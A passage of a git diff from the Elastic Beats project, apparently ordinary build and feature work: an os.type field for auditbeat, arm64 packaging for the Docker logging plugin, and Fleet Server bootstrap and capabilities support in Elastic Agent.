"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" } diff --git a/x-pack/auditbeat/module/system/host/_meta/data.json b/x-pack/auditbeat/module/system/host/_meta/data.json index e0b0818dcae8..a4494027c6bd 100644 --- a/x-pack/auditbeat/module/system/host/_meta/data.json +++ b/x-pack/auditbeat/module/system/host/_meta/data.json @@ -47,6 +47,7 @@ }, "timezone.name": "UTC", "timezone.offset.sec": 0, + "type": "linux", "uptime": 18661357350265 } } diff --git a/x-pack/auditbeat/module/system/host/_meta/fields.yml b/x-pack/auditbeat/module/system/host/_meta/fields.yml index 642a3c449625..3d6ca173d83f 100644 --- a/x-pack/auditbeat/module/system/host/_meta/fields.yml +++ b/x-pack/auditbeat/module/system/host/_meta/fields.yml @@ -77,3 +77,7 @@ type: keyword description: > The operating system's kernel version. + - name: type + type: keyword + description: > + OS type (see ECS os.type). diff --git a/x-pack/auditbeat/module/system/host/host.go b/x-pack/auditbeat/module/system/host/host.go index 9aa0f7fb2e72..3a4bb38dee9c 100644 --- a/x-pack/auditbeat/module/system/host/host.go +++ b/x-pack/auditbeat/module/system/host/host.go @@ -144,6 +144,10 @@ func (host *Host) toMapStr() common.MapStr { mapstr.Put("os.codename", host.Info.OS.Codename) } + if host.Info.OS.Type != "" { + mapstr.Put("os.type", host.Info.OS.Type) + } + var ipStrings []string for _, ip := range host.Ips { ipStrings = append(ipStrings, ip.String()) @@ -362,6 +366,7 @@ func hostEvent(host *Host, eventType string, action eventAction) mb.Event { hostFields.CopyFieldsTo(hostTopLevel, "os.kernel") hostFields.CopyFieldsTo(hostTopLevel, "os.name") hostFields.CopyFieldsTo(hostTopLevel, "os.platform") + hostFields.CopyFieldsTo(hostTopLevel, "os.type") hostFields.CopyFieldsTo(hostTopLevel, "os.version") event.RootFields.Put("host", hostTopLevel) diff --git a/x-pack/auditbeat/module/system/socket/state.go b/x-pack/auditbeat/module/system/socket/state.go index 485ca4b1f1d2..369ba6705b09 100644 --- a/x-pack/auditbeat/module/system/socket/state.go +++ b/x-pack/auditbeat/module/system/socket/state.go @@ -985,11 +985,11 @@ func (f *flow) toEvent(final bool) (ev mb.Event, err error) { gid := strconv.Itoa(int(f.process.gid)) root.Put("user.id", uid) root.Put("group.id", gid) - if name := userCache.LookupUID(uid); name != "" { + if name := userCache.LookupID(uid); name != "" { root.Put("user.name", name) root.Put("related.user", []string{name}) } - if name := groupCache.LookupGID(gid); name != "" { + if name := groupCache.LookupID(gid); name != "" { root.Put("group.name", name) } metricset["uid"] = f.process.uid diff --git a/x-pack/dockerlogbeat/Dockerfile b/x-pack/dockerlogbeat/Dockerfile.tmpl similarity index 82% rename from x-pack/dockerlogbeat/Dockerfile rename to x-pack/dockerlogbeat/Dockerfile.tmpl index 93fffb3e039f..01e7d951ab68 100644 --- a/x-pack/dockerlogbeat/Dockerfile +++ b/x-pack/dockerlogbeat/Dockerfile.tmpl @@ -1,4 +1,4 @@ -FROM alpine:3.7 +FROM {{ .from }} RUN apk --no-cache add ca-certificates COPY build/plugin/dockerlogbeat /usr/bin/ diff --git a/x-pack/dockerlogbeat/Jenkinsfile.yml b/x-pack/dockerlogbeat/Jenkinsfile.yml index bc430fbf89f4..ee9a4b06aca5 100644 --- a/x-pack/dockerlogbeat/Jenkinsfile.yml +++ b/x-pack/dockerlogbeat/Jenkinsfile.yml @@ -21,3 +21,7 @@ stages: build: mage: "mage build test" withModule: true ## run the ITs only if the changeset affects a specific module. + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/x-pack/dockerlogbeat/magefile.go b/x-pack/dockerlogbeat/magefile.go index b6abbad70fd1..4c0c7daeb02f 100644 --- a/x-pack/dockerlogbeat/magefile.go +++ b/x-pack/dockerlogbeat/magefile.go @@ -13,6 +13,7 @@ import ( "io/ioutil" "os" "path/filepath" + "runtime" "strings" "time" @@ -44,17 +45,27 @@ const ( packageStagingDir = "build/package/" packageEndDir = "build/distributions/" rootImageName = "rootfsimage" + dockerfileTmpl = "Dockerfile.tmpl" ) var ( buildDir = filepath.Join(packageStagingDir, logDriverName) dockerExportPath = filepath.Join(packageStagingDir, "temproot.tar") + + platformMap = map[string]map[string]interface{}{ + "amd64": map[string]interface{}{ + "from": "alpine:3.10", + }, + "arm64": map[string]interface{}{ + "from": "arm64v8/alpine:3.10", + }, + } ) func init() { devtools.BeatLicense = "Elastic License" devtools.BeatDescription = "The Docker Logging Driver is a docker plugin for the Elastic Stack." - devtools.Platforms = devtools.Platforms.Filter("linux/amd64") + devtools.Platforms = devtools.Platforms.Filter("linux/amd64 linux/arm64") } // getPluginName returns the fully qualified name:version string. @@ -67,7 +78,7 @@ func getPluginName() (string, error) { } // createContainer builds the plugin and creates the container that will later become the rootfs used by the plugin -func createContainer(ctx context.Context, cli *client.Client) error { +func createContainer(ctx context.Context, cli *client.Client, arch string) error { dockerLogBeatDir, err := os.Getwd() if err != nil { return errors.Wrap(err, "error getting work dir") @@ -77,6 +88,12 @@ func createContainer(ctx context.Context, cli *client.Client) error { return errors.Errorf("not in dockerlogbeat directory: %s", dockerLogBeatDir) } + dockerfile := filepath.Join(packageStagingDir, "Dockerfile") + err = devtools.ExpandFile(dockerfileTmpl, dockerfile, platformMap[arch]) + if err != nil { + return errors.Wrap(err, "error while expanding Dockerfile template") + } + // start to build the root container that'll be used to build the plugin tmpDir, err := ioutil.TempDir("", "dockerBuildTar") if err != nil { @@ -98,7 +115,7 @@ func createContainer(ctx context.Context, cli *client.Client) error { buildOpts := types.ImageBuildOptions{ Tags: []string{rootImageName}, - Dockerfile: "Dockerfile", + Dockerfile: dockerfile, } //build, wait for output buildResp, err := cli.ImageBuild(ctx, buildContext, buildOpts) @@ -137,56 +154,64 @@ func BuildContainer(ctx context.Context) error { return errors.Wrap(err, "error creating build dir") } - err = createContainer(ctx, cli) - if err != nil { - return errors.Wrap(err, "error creating base container") - } + for _, plat := range devtools.Platforms { + arch := plat.GOARCH() + if runtime.GOARCH != arch { + fmt.Println("Skippping building for", arch, "as runtime is different") + continue + } - // create the container that will become our rootfs - CreatedContainerBody, err := cli.ContainerCreate(ctx, &container.Config{Image: rootImageName}, nil, nil, "") - if err != nil { - return errors.Wrap(err, "error creating container") - } + err = createContainer(ctx, cli, arch) + if err != nil { + return errors.Wrap(err, "error creating base container") + } - defer func() { - // cleanup - if _, noClean := os.LookupEnv("DOCKERLOGBEAT_NO_CLEANUP"); !noClean { - err = cleanDockerArtifacts(ctx, CreatedContainerBody.ID, cli) - if err != nil { - fmt.Fprintf(os.Stderr, "Error cleaning up docker: %s", err) - } + // create the container that will become our rootfs + CreatedContainerBody, err := cli.ContainerCreate(ctx, &container.Config{Image: rootImageName}, nil, nil, "") + if err != nil { + return errors.Wrap(err, "error creating container") } - }() - fmt.Printf("Got image: %#v\n", CreatedContainerBody.ID) + defer func() { + // cleanup + if _, noClean := os.LookupEnv("DOCKERLOGBEAT_NO_CLEANUP"); !noClean { + err = cleanDockerArtifacts(ctx, CreatedContainerBody.ID, cli) + if err != nil { + fmt.Fprintf(os.Stderr, "Error cleaning up docker: %s", err) + } + } + }() - file, err := os.Create(dockerExportPath) - if err != nil { - return errors.Wrap(err, "error creating tar archive") - } + fmt.Printf("Got image: %#v\n", CreatedContainerBody.ID) - // export the container to a tar file - exportReader, err := cli.ContainerExport(ctx, CreatedContainerBody.ID) - if err != nil { - return errors.Wrap(err, "error exporting container") - } + file, err := os.Create(dockerExportPath) + if err != nil { + return errors.Wrap(err, "error creating tar archive") + } - _, err = io.Copy(file, exportReader) - if err != nil { - return errors.Wrap(err, "error writing exported container") - } + // export the container to a tar file + exportReader, err := cli.ContainerExport(ctx, CreatedContainerBody.ID) + if err != nil { + return errors.Wrap(err, "error exporting container") + } - //misc prepare operations + _, err = io.Copy(file, exportReader) + if err != nil { + return errors.Wrap(err, "error writing exported container") + } - err = devtools.Copy("config.json", filepath.Join(buildDir, "config.json")) - if err != nil { - return errors.Wrap(err, "error copying config.json") - } + //misc prepare operations - // unpack the tar file into a root directory, which is the format needed for the docker plugin create tool - err = sh.RunV("tar", "-xf", dockerExportPath, "-C", filepath.Join(buildDir, "rootfs")) - if err != nil { - return errors.Wrap(err, "error unpacking exported container") + err = devtools.Copy("config.json", filepath.Join(buildDir, "config.json")) + if err != nil { + return errors.Wrap(err, "error copying config.json") + } + + // unpack the tar file into a root directory, which is the format needed for the docker plugin create tool + err = sh.RunV("tar", "-xf", dockerExportPath, "-C", filepath.Join(buildDir, "rootfs")) + if err != nil { + return errors.Wrap(err, "error unpacking exported container") + } } return nil @@ -293,20 +318,23 @@ func Export() error { version = version + "-SNAPSHOT" } - tarballName := fmt.Sprintf("%s-%s-%s.tar.gz", logDriverName, version, "docker-plugin") + for _, plat := range devtools.Platforms { + arch := plat.GOARCH() + tarballName := fmt.Sprintf("%s-%s-%s-%s.tar.gz", logDriverName, version, arch, "docker-plugin") - outpath := filepath.Join("../..", packageEndDir, tarballName) + outpath := filepath.Join("../..", packageEndDir, tarballName) - err = os.Chdir(packageStagingDir) - if err != nil { - return errors.Wrap(err, "error changing directory") - } + err = os.Chdir(packageStagingDir) + if err != nil { + return errors.Wrap(err, "error changing directory") + } - err = sh.RunV("tar", "zcf", outpath, - filepath.Join(logDriverName, "rootfs"), - filepath.Join(logDriverName, "config.json")) - if err != nil { - return errors.Wrap(err, "error creating release tarball") + err = sh.RunV("tar", "zcf", outpath, + filepath.Join(logDriverName, "rootfs"), + filepath.Join(logDriverName, "config.json")) + if err != nil { + return errors.Wrap(err, "error creating release tarball") + } } return nil @@ -337,14 +365,28 @@ func Package() { start := time.Now() defer func() { fmt.Println("package ran for", time.Since(start)) }() - if _, enabled := devtools.Platforms.Get("linux/amd64"); !enabled { - fmt.Println(">> package: skipping because linux/amd64 is not enabled") + if !isSupportedPlatform() { + fmt.Println(">> package: skipping because no supported platform is enabled") return } mg.SerialDeps(Build, Export) } +func isSupportedPlatform() bool { + _, isAMD64Selected := devtools.Platforms.Get("linux/amd64") + _, isARM64Selected := devtools.Platforms.Get("linux/arm64") + arch := runtime.GOARCH + + if arch == "amd64" && isARM64Selected { + devtools.Platforms = devtools.Platforms.Remove("linux/arm64") + } else if arch == "arm64" && isAMD64Selected { + devtools.Platforms = devtools.Platforms.Remove("linux/amd64") + } + + return len(devtools.Platforms) > 0 +} + // BuildAndInstall builds and installs the plugin func BuildAndInstall() { mg.SerialDeps(Build, Install) diff --git a/x-pack/dockerlogbeat/readme.md b/x-pack/dockerlogbeat/readme.md index 8be33cf2b3d0..6919e47f0efb 100644 --- a/x-pack/dockerlogbeat/readme.md +++ b/x-pack/dockerlogbeat/readme.md @@ -18,7 +18,7 @@ The Plugin supports a number of Elasticsearch config options: ``` docker run --log-driver=elastic/{log-driver-alias}:{version} \ - --log-opt endpoint="myhost:9200" \ + --log-opt hosts="myhost:9200" \ --log-opt user="myusername" \ --log-opt password="mypassword" \ -it debian:jessie /bin/bash diff --git a/x-pack/elastic-agent/CHANGELOG.asciidoc b/x-pack/elastic-agent/CHANGELOG.asciidoc index 5e520a596c21..b0b5066d27d2 100644 --- a/x-pack/elastic-agent/CHANGELOG.asciidoc +++ b/x-pack/elastic-agent/CHANGELOG.asciidoc @@ -33,6 +33,8 @@ - Fixed reenroll scenario {pull}23686[23686] - Fixed Monitoring filebeat and metricbeat not connecting to Agent over GRPC {pull}23843[23843] - Fixed make status readable in the log. {pull}23849[23849] +- Windows agent doesn't uninstall with a lowercase `c:` drive in the path {pull}23998[23998] +- Fix reloading of log level for services {pull}[24055]24055 ==== New features @@ -52,6 +54,7 @@ - Add --staging option to enroll command {pull}20026[20026] - Add `event.dataset` to all events {pull}20076[20076] - Send datastreams fields {pull}20416[20416] +- Agent supports capabilities definition {pull}23848[23848] [[release-notes-7.8.0]] === Elastic Agent version 7.8.0 diff --git a/x-pack/elastic-agent/CHANGELOG.next.asciidoc b/x-pack/elastic-agent/CHANGELOG.next.asciidoc index f1f8c39d7fdc..3f0419ca38d7 100644 --- a/x-pack/elastic-agent/CHANGELOG.next.asciidoc +++ b/x-pack/elastic-agent/CHANGELOG.next.asciidoc @@ -29,6 +29,7 @@ - Fix sysv init files for deb/rpm installation {pull}22543[22543] - Fix shell wrapper for deb/rpm packaging {pull}23038[23038] - Fixed parsing of npipe URI {pull}22978[22978] +- Select default agent policy if no enrollment token provided. {pull}23973[23973] - Remove artifacts on transient download errors {pull}23235[23235] - Support for linux/arm64 {pull}23479[23479] - Skip top level files when unziping archive during upgrade {pull}23456[23456] @@ -37,6 +38,8 @@ - Fix issue of missing log messages from filebeat monitor {pull}23514[23514] - Increase checkin grace period to 30 seconds {pull}23568[23568] - Fix libbeat from reporting back degraded on config update {pull}23537[23537] +- Fix issues with dynamic inputs and conditions {pull}23886[23886] +- Fix bad substitution of API key. {pull}24036[24036] ==== New features @@ -44,6 +47,7 @@ - Improved version CLI {pull}20359[20359] - Enroll CLI now restarts running daemon {pull}20359[20359] - Add restart CLI cmd {pull}20359[20359] +- Add new `synthetics/*` inputs to run Heartbeat {pull}20387[20387] - Users of the Docker image can now pass `FLEET_ENROLL_INSECURE=1` to include the `--insecure` flag with the `elastic-agent enroll` command {issue}20312[20312] {pull}20713[20713] - Add `docker` composable dynamic provider. {pull}20842[20842] - Add support for dynamic inputs with providers and `{{variable|"default"}}` substitution. {pull}20839[20839] @@ -65,3 +69,4 @@ - Push log level downstream {pull}22815[22815] - Add metrics collection for Agent {pull}22793[22793] - Add support for Fleet Server {pull}23736[23736] +- Add support for enrollment with local bootstrap of Fleet Server {pull}23865[23865] diff --git a/x-pack/elastic-agent/Jenkinsfile.yml b/x-pack/elastic-agent/Jenkinsfile.yml index 0e6ecef9e4cd..9a30d836391b 100644 --- a/x-pack/elastic-agent/Jenkinsfile.yml +++ b/x-pack/elastic-agent/Jenkinsfile.yml @@ -85,3 +85,7 @@ stages: # - "windows-7-32" # branches: true ## for all the branches # tags: true ## for all the tags + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/x-pack/elastic-agent/magefile.go b/x-pack/elastic-agent/magefile.go index fad5ef935aac..0149e7ea0bd4 100644 --- a/x-pack/elastic-agent/magefile.go +++ b/x-pack/elastic-agent/magefile.go @@ -577,7 +577,7 @@ func packageAgent(requiredPackages []string, packagingFn func()) { defer os.RemoveAll(dropPath) defer os.Unsetenv(agentDropPath) - packedBeats := []string{"filebeat", "metricbeat"} + packedBeats := []string{"filebeat", "heartbeat", "metricbeat"} for _, b := range packedBeats { pwd, err := filepath.Abs(filepath.Join("..", b)) @@ -591,6 +591,9 @@ func packageAgent(requiredPackages []string, packagingFn func()) { cmd.Stdout = os.Stdout cmd.Stderr = os.Stderr cmd.Env = append(os.Environ(), fmt.Sprintf("PWD=%s", pwd), "AGENT_PACKAGING=on") + if envVar := selectedPackageTypes(); envVar != "" { + cmd.Env = append(cmd.Env, envVar) + } if err := cmd.Run(); err != nil { panic(err) @@ -613,6 +616,14 @@ func packageAgent(requiredPackages []string, packagingFn func()) { mg.SerialDeps(devtools.Package, TestPackages) } +func selectedPackageTypes() string { + if len(devtools.SelectedPackageTypes) == 0 { + return "" + } + + return "PACKAGES=targz,zip" +} + func copyAll(from, to string) error { return filepath.Walk(from, func(path string, info os.FileInfo, err error) error { if err != nil { diff --git a/x-pack/elastic-agent/pkg/agent/application/application.go b/x-pack/elastic-agent/pkg/agent/application/application.go index f87cad3a09cd..c13157e02f52 100644 --- a/x-pack/elastic-agent/pkg/agent/application/application.go +++ b/x-pack/elastic-agent/pkg/agent/application/application.go @@ -6,6 +6,11 @@ package application import ( "context" + "fmt" + + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/storage" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/status" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/upgrade" @@ -31,11 +36,11 @@ type upgraderControl interface { } // New creates a new Agent and bootstrap the required subsystem. -func New(log *logger.Logger, pathConfigFile string, reexec reexecManager, uc upgraderControl, agentInfo *info.AgentInfo) (Application, error) { +func New(log *logger.Logger, pathConfigFile string, reexec reexecManager, statusCtrl status.Controller, uc upgraderControl, agentInfo *info.AgentInfo) (Application, error) { // Load configuration from disk to understand in which mode of operation // we must start the elastic-agent, the mode of operation cannot be changed without restarting the // elastic-agent. - rawConfig, err := LoadConfigFromFile(pathConfigFile) + rawConfig, err := config.LoadFile(pathConfigFile) if err != nil { return nil, err } @@ -44,7 +49,7 @@ func New(log *logger.Logger, pathConfigFile string, reexec reexecManager, uc upg return nil, err } - return createApplication(log, pathConfigFile, rawConfig, reexec, uc, agentInfo) + return createApplication(log, pathConfigFile, rawConfig, reexec, statusCtrl, uc, agentInfo) } func createApplication( @@ -52,6 +57,7 @@ func createApplication( pathConfigFile string, rawConfig *config.Config, reexec reexecManager, + statusCtrl status.Controller, uc upgraderControl, agentInfo *info.AgentInfo, ) (Application, error) { @@ -66,14 +72,72 @@ func createApplication( if IsStandalone(cfg.Fleet) { log.Info("Agent is managed locally") - return newLocal(ctx, log, pathConfigFile, rawConfig, reexec, uc, agentInfo) + return newLocal(ctx, log, pathConfigFile, rawConfig, reexec, statusCtrl, uc, agentInfo) + } + + // not in standalone; both modes require reading the fleet.yml configuration file + var store storage.Store + store, cfg, err = mergeFleetConfig(rawConfig) + + if IsFleetServerBootstrap(cfg.Fleet) { + log.Info("Agent is in Fleet Server bootstrap mode") + return newFleetServerBootstrap(ctx, log, pathConfigFile, rawConfig, statusCtrl, agentInfo) } log.Info("Agent is managed by Fleet") - return newManaged(ctx, log, rawConfig, reexec, agentInfo) + return newManaged(ctx, log, store, cfg, rawConfig, reexec, statusCtrl, agentInfo) } // IsStandalone decides based on missing of fleet.enabled: true or fleet.{access_token,kibana} will place Elastic Agent into standalone mode. func IsStandalone(cfg *configuration.FleetAgentConfig) bool { return cfg == nil || !cfg.Enabled } + +// IsFleetServerBootstrap decides if Elastic Agent is started in bootstrap mode. +func IsFleetServerBootstrap(cfg *configuration.FleetAgentConfig) bool { + return cfg != nil && cfg.Server != nil && cfg.Server.Bootstrap +} + +func mergeFleetConfig(rawConfig *config.Config) (storage.Store, *configuration.Configuration, error) { + path := info.AgentConfigFile() + store := storage.NewDiskStore(path) + reader, err := store.Load() + if err != nil { + return store, nil, errors.New(err, "could not initialize config store", + errors.TypeFilesystem, + errors.M(errors.MetaKeyPath, path)) + } + config, err := config.NewConfigFrom(reader) + if err != nil { + return store, nil, errors.New(err, + fmt.Sprintf("fail to read configuration %s for the elastic-agent", path), + errors.TypeFilesystem, + errors.M(errors.MetaKeyPath, path)) + } + + // merge local configuration and configuration persisted from fleet. + err = rawConfig.Merge(config) + if err != nil { + return store, nil, errors.New(err, + fmt.Sprintf("fail to merge configuration with %s for the elastic-agent", path), + errors.TypeConfig, + errors.M(errors.MetaKeyPath, path)) + } + + cfg, err := configuration.NewFromConfig(rawConfig) + if err != nil { + return store, nil, errors.New(err, + fmt.Sprintf("fail to unpack configuration from %s", path), + errors.TypeFilesystem, + errors.M(errors.MetaKeyPath, path)) + } + + if err := cfg.Fleet.Valid(); err != nil { + return store, nil, errors.New(err, + "fleet configuration is invalid", + errors.TypeFilesystem, + errors.M(errors.MetaKeyPath, path)) + } + + return store, cfg, nil +} diff --git a/x-pack/elastic-agent/pkg/agent/application/config.go b/x-pack/elastic-agent/pkg/agent/application/config.go index e42f3dcab280..d0eb80449a21 100644 --- a/x-pack/elastic-agent/pkg/agent/application/config.go +++ b/x-pack/elastic-agent/pkg/agent/application/config.go @@ -5,16 +5,8 @@ package application import ( - "io/ioutil" - - "github.com/elastic/go-ucfg" - - "gopkg.in/yaml.v2" - - "github.com/elastic/beats/v7/libbeat/common" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/kibana" ) @@ -35,52 +27,25 @@ func createFleetConfigFromEnroll(accessAPIKey string, kbn *kibana.Config) (*conf return cfg, nil } -// LoadConfigFromFile loads the Agent configuration from a file. -// -// This must be used to load the Agent configuration, so that variables defined in the inputs are not -// parsed by go-ucfg. Variables from the inputs should be parsed by the transpiler. -func LoadConfigFromFile(path string) (*config.Config, error) { - in, err := ioutil.ReadFile(path) +func createFleetServerBootstrapConfig(connStr string, policyID string) (*configuration.FleetAgentConfig, error) { + es, err := configuration.ElasticsearchFromConnStr(connStr) if err != nil { return nil, err } - var m map[string]interface{} - if err := yaml.Unmarshal(in, &m); err != nil { - return nil, err - } - return LoadConfig(m) -} - -// LoadConfig loads the Agent configuration from a map. -// -// This must be used to load the Agent configuration, so that variables defined in the inputs are not -// parsed by go-ucfg. Variables from the inputs should be parsed by the transpiler. -func LoadConfig(in map[string]interface{}) (*config.Config, error) { - // make copy of a map so we dont affect a caller - m := common.MapStr(in).Clone() - - inputs, ok := m["inputs"] - if ok { - // remove the inputs - delete(m, "inputs") + cfg := configuration.DefaultFleetAgentConfig() + cfg.Enabled = true + cfg.Server = &configuration.FleetServerConfig{ + Bootstrap: true, + Output: configuration.FleetServerOutputConfig{ + Elasticsearch: es, + }, } - cfg, err := config.NewConfigFrom(m) - if err != nil { - return nil, err + if policyID != "" { + cfg.Server.Policy = &configuration.FleetServerPolicyConfig{ID: policyID} } - if ok { - inputsOnly := map[string]interface{}{ - "inputs": inputs, - } - // convert to config without variable substitution - inputsCfg, err := config.NewConfigFrom(inputsOnly, ucfg.PathSep("."), ucfg.ResolveNOOP) - if err != nil { - return nil, err - } - err = cfg.Merge(inputsCfg, ucfg.PathSep("."), ucfg.ResolveNOOP) - if err != nil { - return nil, err - } + + if err := cfg.Valid(); err != nil { + return nil, errors.New(err, "invalid enrollment options", errors.TypeConfig) } - return cfg, err + return cfg, nil } diff --git a/x-pack/elastic-agent/pkg/agent/application/config_test.go b/x-pack/elastic-agent/pkg/agent/application/config_test.go index 09acd68dd83a..824691295fec 100644 --- a/x-pack/elastic-agent/pkg/agent/application/config_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/config_test.go @@ -6,8 +6,6 @@ package application import ( "io/ioutil" - "os" - "path/filepath" "testing" "time" @@ -20,44 +18,6 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" ) -func TestLoadConfig(t *testing.T) { - contents := map[string]interface{}{ - "outputs": map[string]interface{}{ - "default": map[string]interface{}{ - "type": "elasticsearch", - "hosts": []interface{}{"127.0.0.1:9200"}, - "username": "elastic", - "password": "changeme", - }, - }, - "inputs": []interface{}{ - map[string]interface{}{ - "type": "logfile", - "streams": []interface{}{ - map[string]interface{}{ - "paths": []interface{}{"/var/log/${host.name}"}, - }, - }, - }, - }, - } - - tmp, err := ioutil.TempDir("", "config") - require.NoError(t, err) - defer os.RemoveAll(tmp) - - cfgPath := filepath.Join(tmp, "config.yml") - dumpToYAML(t, cfgPath, contents) - - cfg, err := LoadConfigFromFile(cfgPath) - require.NoError(t, err) - - cfgData, err := cfg.ToMapStr() - require.NoError(t, err) - - assert.Equal(t, contents, cfgData) -} - func TestConfig(t *testing.T) { testMgmtMode(t) testLocalConfig(t) diff --git a/x-pack/elastic-agent/pkg/agent/application/emitter.go b/x-pack/elastic-agent/pkg/agent/application/emitter.go index 5faa6814e777..0b575db52f76 100644 --- a/x-pack/elastic-agent/pkg/agent/application/emitter.go +++ b/x-pack/elastic-agent/pkg/agent/application/emitter.go @@ -14,6 +14,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/capabilities" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" @@ -42,6 +43,7 @@ type emitterController struct { router programsDispatcher modifiers *configModifiers reloadables []reloadable + caps capabilities.Capability // state lock sync.RWMutex @@ -65,6 +67,20 @@ func (e *emitterController) Update(c *config.Config) error { if err != nil { return errors.New(err, "could not create the AST from the configuration", errors.TypeConfig) } + + if e.caps != nil { + var ok bool + updatedAst, err := e.caps.Apply(rawAst) + if err != nil { + return errors.New(err, "failed to apply capabilities") + } + + rawAst, ok = updatedAst.(*transpiler.AST) + if !ok { + return errors.New("failed to transform object returned from capabilities to AST", errors.TypeConfig) + } + } + for _, filter := range e.modifiers.Filters { if err := filter(e.logger, rawAst); err != nil { return errors.New(err, "failed to filter configuration", errors.TypeConfig) @@ -142,7 +158,7 @@ func (e *emitterController) update() error { return e.router.Dispatch(ast.HashStr(), programsToRun) } -func emitter(ctx context.Context, log *logger.Logger, agentInfo *info.AgentInfo, controller composable.Controller, router programsDispatcher, modifiers *configModifiers, reloadables ...reloadable) (emitterFunc, error) { +func emitter(ctx context.Context, log *logger.Logger, agentInfo *info.AgentInfo, controller composable.Controller, 